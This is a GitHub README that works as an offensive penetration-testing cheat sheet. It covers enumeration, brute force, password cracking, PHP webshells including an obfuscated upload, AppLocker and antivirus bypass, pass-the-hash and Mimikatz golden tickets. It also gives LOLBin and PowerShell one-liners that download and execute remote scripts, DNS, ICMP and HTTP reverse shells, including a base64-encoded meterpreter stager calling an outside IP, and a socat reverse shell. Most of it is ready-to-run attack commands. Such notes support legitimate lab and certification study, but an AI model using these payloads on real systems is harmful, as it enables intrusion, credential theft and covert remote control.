Skip to content
Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios
Branch: master
Clone or download
root
Latest commit 9314bdd Apr 1, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Phishing tree Mar 22, 2019
PostExplotation tree Mar 22, 2019
Recon phaontJS with cookie file Apr 1, 2019
Shells
WebVulnerabilities tree Mar 22, 2019
README.md Update README.md Dec 12, 2018

README.md

Table of Contents


Enumeration

Generic Enumeration

  • port fullscan

  • UDP scan

HTTP Enumeration

  • dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old

  • banner inspection

  • review source code

  • bruteforce with cewl-based dictionary

  • searchsploit look at versions properly

  • test all the paths with the exploits, mangle it

  • nmap --script vuln

  • nmap --script safe (ssl-cert, virtual hosts)

  • always incercept with Burp

  • nikto -h

  • LFI, RFI, SQL, RCE, XXE, SSRF injections

  • PUT method all directories

  • Change POST body encoding with Burp

  • Bruteforce parameter names

  • dirsearch with cookie once authenticated

  • download vulnerable application from exploit-db and examine it

SSH Enumeration

  • shellshock

  • bruteforce

  • user_enum

  • Debian OpenSSL Predictable PRNG

SMB Enumeration

  • nmap --script vuln

  • nmap --script smb*

  • nmap --script smb-enum-shares,smb-ls

  • enum4linux

SNMP Enumeration

  • snmpcheck

  • snmpenum

Explotation

BOF exploit-based

  • change shellcode

  • make sure all badchars are removed

  • read the exploit properly in case this makes changes in the shellcode

  • capture traffic with wireshark making sure the entire shellcode is transmited

  • run the exploit several times

  • make sure the JMP ESP matches OS and language

Weak Credentials

HTTP Brute Force

  • wfuzz POST

wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php

  • hydra POST

hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20

  • wfuzz NTLM

wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api

  • wfuzz Basic Auth through Proxy

wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/

Password Cracking

  • zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

  • /etc/shadow
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
  • keepass
keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass file
  • Bruteforce Salted
for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done
openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends

RCE

PHP RCE

test:

<?php phpinfo(); ?>

simple shell:

<?php system($_GET["c"]); ?>

<?php `$_GET["c"]`; ?>

file upload:

<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>

file upload evasion: rot13 + urlencode

<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/test8.php', str_rot13(urldecode($payload))); ?>

RCE via webshell

RCE via WMIC

Powershell without powershell:

Generate payload with web_delivery

powershellless1

Encode Payload

powershellless2

Include payload in xsl file

powershellless3

wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"

powershellless4

LOLBINS

SyncAppvPublishingServer

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX"

lolbin1

rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll")

Privilege Escalation

Linux Privilege Escalation

  • sudo -l
  • Kernel Exploits
  • OS Exploits
  • Password reuse (mysql, .bash_history, 000-default.conf...)
  • Known binaries with suid flag and interactive (nmap)
  • Custom binaries with suid flag either using other binaries or with command execution
  • Writable files owned by root that get executed (cronjobs)
  • MySQL as root
  • Vulnerable services (chkrootkit, logrotate)
  • Writable /etc/passwd
  • Readable .bash_history
  • SSH private key
  • Listening ports on localhost
  • /etc/fstab
  • /etc/exports
  • /var/mail
  • Process as other user (root) executing something you have permissions to modify
  • SSH public key + Predictable PRNG
  • apt update hooking (Pre-Invoke)
  • Capabilities

Windows Privilege Escalation

  • Kernel Exploits
  • OS Exploits
  • Pass The Hash
  • Password reuse
  • DLL hijacking (Path)
  • Vulnerable services
  • Writable services binaries path
  • Unquoted services
  • Listening ports on localhost
  • Registry keys

Kernel Exploits

Linux: https://github.com/lucyoa/kernel-exploits

Windows: https://github.com/abatchy17/WindowsExploits

Tunneling & Port Forwarding

SSH over HTTP (Squid)

socat

socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128

ssh john@127.0.0.1 -p 9999

proxytunnel

proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555

ssh john@127.0.0.1 -p 5555

proxychains

http 192.168.1.41 3128

proxychains ssh john@127.0.0.1

proxychains

corkscrew

ssh john@192.168.1.41 -t /bin/sh

cork

TCP over HTTP

For this technique, it is necessary to be able to upload a file to a webserver.

1. reGeorg

File upload to the server correct

regeorge2

Tunnel creation

python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"

Proxychains config

regeorge1

proxychains nmap -F -sT 127.0.0.1
proxychains mysql -u root -p -h 127.0.0.1
proxychains ssh localhost

regeorge3

Reference: https://sensepost.com/discover/tools/reGeorg/

2. ABBTTS

Upload File

abbtts5

Config proxychains and create the tunnel

python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22

Usage

ssh -p 22222 user@127.0.0.1

abbtts7

Reference: https://github.com/nccgroup/ABPTTS

HTTP Redirectors

1. socat

socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80

socatt

2. iptables

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

iptables

Windows Socks Proxy

In this case this is going to be used to access Burp listening on a Windows NATed VM from other PCs in the same network as the Windows Host.

From the Windows Host machine (IP: 192.168.1.206)

Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 1234

invokesocks

From other PC on the Windows Host machine network (IP: 192.168.1.69)

Configure proxychains.conf:

 socks4 	192.168.1.206 1234 
proxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:192.168.48.158:8080

This command ahead makes Burp (which is listening on the NATed machine) accessible from 192.168.1.69 on port 8081

Now, configure the Proxy in the browser:

proxyconf

All the traffic is logged on the NATed machine Burp.

Reference: https://github.com/p3nt4/Invoke-SocksProxy

Man's Poor VPN

Traffic forward over SSH without needing to ssh -D <port>

sshuttle -vr user@192.168.207.57 1X0.1X.0.0/16

sshuttle

Proof:

mantis2

Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/

Windows AD Environment

Bypass Applocker

1. rundll32

rundll32.exe PowerShdll.dll,main

applocker

Reference: https://github.com/p3nt4/PowerShdll

2. Alternative powershell files

applocker2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise

Pass The Hash

Invoke a command Remotely

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')
 
 Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt"

Invoke Mimikatz Remotely

Invoke-WMIExec -Target SVHOST2  -Username Administrator
-Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"

image

Pass The Hash with Mimikatz

 Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'

Kerberos

Generate Golden Ticket (Domain Admin Required)

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'

image

image

Invoke-Mimikatz  -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"

image

Invoke-Mimikatz  -Command '"kerberos::ptt admin.kirbi"'

image

image

Miscellaneous

Invoke Mimikatz

IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

Mimikatz C#

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs

https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7

In case compiler is outdated:

nuget install Microsoft.Net.Compilers

Runas Powershell

Start-Process powershell.exe -Verb runas Start-Process powershell.exe -Credential <user>

View Shares With Permissions

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"

image

View files that contain certain words recursively

 ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","*
admin*","*secret*" -Recurse -ErrorAction SilentlyContinue

image

View files which name contains certain words recursively

dir -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse -ErrorAction SilentlyContinue

image

Connect to MSSQL Database

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')

Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password  -Query "exec sp_databases" 

Port Scanning

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')

Invoke-Portscan -Hosts [ip] -TopPorts 50

image

View Domain Admins

 net groups /domain "Domain Admins"

image

View Domain Controlers

nltest /dclist: 

image

Get Hashes

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

image

Check Pass The Hash with multiple servers

$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP")

foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose }

image

Run web_delivery with other identity

 runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass] 

cabesha

References: https://www.hacklikeapornstar.com/

Reverse Shells

Reverse DNS Shell with dnscat powershell

Server

ruby dnscat2.rb -e open --no-cache tunnel.domain.com

Client

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 

dns

Reference: https://github.com/lukebaggett/dnscat2-powershell

Reverse ICMP shell

Server

 python icmpsh_m.py [IP atacante] [IP victima] 

Client

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]

icmpreverseshell

Reference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/

Reverse HTTP Shell through Proxy

use payload/python/meterpreter/reverse_http

proxy2

python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"

Finally we set up the handler:

proxy3

Miscellaneous

Interactive Reverse Shell

Method 1

Attacker:

socat file:`tty`,raw,echo=0 TCP-L:4444

Victim:

wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444

Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

Method 2

In reverse shell

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

In kali

echo $TERM
stty -a
stty raw -echo
fg

In reverse shell

reset
export SHELL=bash
export TERM=xterm-256color
stty rows  columns 
bash

rbash Jail Escape

RequestTTY no

ssh -o RequestTTY=no user@ip

ttyno

and the result would be:

ttyfalse2

Bash --noprofile

ssh monitor@127.0.0.1 -t "bash --noprofile" 

bashnoprofile

Windows File Transfer

bitsadmin

bitsadmin /transfer debjob /download /priority normal http://<ip>/shell.php c:\xampp\htdocs\shell.php

cscript wget.vbs (code on the repo)

cscript wget.vbs http://<ip>/test.txt test.txt

powershell

powershell -c "(new-object System.Net.WebClient).Downloadfile('http://<ip>/exploit.exe', 'C:\Windows\temp\exploit.txt')"

ftp

client:

echo open [ip] [port] > ftpscript.txt
echo anonymous>> ftpscript.txt
echo PASS >> ftpscript.txt
echo bin >> ftpscript.txt
echo get meter.exe>> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt

server:

python -m pyftpdlib --port=2121 --write

wget.exe

Upload to vulnerable server from kali: /usr/share/windows-binaries/wget.exe

wget.exe http://<ip>/file file

certutil

certutil -urlcache -split -f https://<ip>/file.txt file.txt

Bypass VPN routing restrictions

openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68’

vpn1

Reference: https://github.com/dlenski/vpn-slice

AV Bypass

SharpSploit

Start-Process "powershell" "unblock-file .\SharpSploit.dll"

Add-Type -Path .\SharpSploit.dll

[SharpSploit.Execution.Shell]::ShellExecute("regsvr32 /s /n /u /i:http://192.168.48.151:9999/QuHBoZ.sct scrobj.dll")

sharpsploit

References: https://cobbr.io/SharpSploit.html

Workflow.Compiler

 C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml 

workflow

References:

https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb

You can’t perform that action at this time.